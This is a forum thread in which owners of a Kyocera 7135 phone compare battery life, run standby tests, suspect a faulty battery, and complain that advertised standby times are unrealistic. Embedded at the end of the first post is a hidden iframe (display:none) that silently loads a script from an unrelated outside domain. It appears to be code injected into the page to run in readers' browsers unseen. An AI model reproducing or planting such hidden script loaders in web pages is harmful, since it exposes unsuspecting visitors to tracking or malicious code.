I activated my 7135 on Verizon and can't get more than two days on the battery life with low usage. Are others seeing the same thing?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Keep in mind, and it's been stated earlier, that your initial battery time is probably going to be pretty low because of all the tinkering and general drooling over your new toy...whipping it out to show everyone...cycling through all the ringtones...again..
that kind of stuff...
It may be a couple weeks before you get into actual normal usage on the phone...but in general...I wouldn't expect exceptional battery performance from the phone...

Since I received mine on the 26th, I have not been real impressed with the battery life...Might be becase I am playing with it...But I have not made many calls or been on the web and it seem like it is a bit power hungy!!!
I understand what you are saying Hot Synch (and btw txs for all the FAQ's!!!) but I did a little test last night as I am concerned. I fully charged the unit till midnight at which time the phone turned off. The phone turned on again at 5 am. I checked bat life at 10 am and it was a little more then 1/2 gone. This was with 10 hours of no activity (12 am to 10 am) of which the phone was only on 5 hours (5 am to 10 am) but with no activity, incoming or outgoing. So I lost 1/2 bat life with 5 hours of just the palm but no activity and 5 hours of no activity on the palm and the phone on but no calls. That means you will be lucky to get a full day on standby. I am very surprised at that bc there was virtually no usage. Wonder if I got a bad battery?
So was the screen on all that time? Or was the handset shut? Was the 7135 in digital or analog?
Mine is sittin ghere and has been on since Friday morning without a charge. It is only missing one bar. I havemaybe used the Palm for 20 minutes all weekend, and talked on it for another 20.

The flip was closed the entire time and it was in digital. Im glad to hear your results though. I just switched batterys and am going to try the same test right now (started clocking it at 11 am). I will let you know.....
It has to be your battery. I have two batteries also. I am experiencing bettery life that is good but not as good as the 6035. But still nothing like whatyou have.

Wow. I've been getting very decent battery life with mine. Even on very long data calls. I charged mine fully last night about 8pm and left it on. When I checked it today at noon, it had only lost one bar. If it was in digital as you said and if you didn't accidentally not disconnect from a data call (which I've done a couple of times), then you may have a bad battery indeed.
Phew, thanks for all your support through this difficult time, I was on the ledge with one foot out there.....
Additional testing shows 10 hours with phone on the whole time, flip closed and only a a matter of minutes of pda use lost only 1 bar. Not that that is great but much better then originally reported by me. The first battery must have been bad. I plan on trying a few more tests while on vaca (I know there will be very few if any calls) to test the standby life of the battery.
I have had the phone on for 15 hours and used like I normally do. Several phone calls, some data calls, and some palm use. Only one bar gone! WooooooooooooooooooHooooooooooooooo!

Yeah, but how hard has it been getting used to the beautiful color screen and other far better features?
What's even funnier is that Alltell's web site on the 7135 and the 6035 list the talk time/standby time as follows:
Talk time Stand by
7135 210 min 160 hours
6035 200 min 100 hours
I know all these times depend on ideal conditions, ie. digital vs. analog, PDA use, vs. phone, etc. but sheesh looks like no one is even coming close to these numbers and certainly comments here (understandably)indicate the 7135 is not better then the 6035 as they (and I assume these are Kyo's numbers) are purporting. What's up with that? I wish these carriers/mfg'rs would have a policy of advertising an average users expectations of battery life and not some pipe dream version.
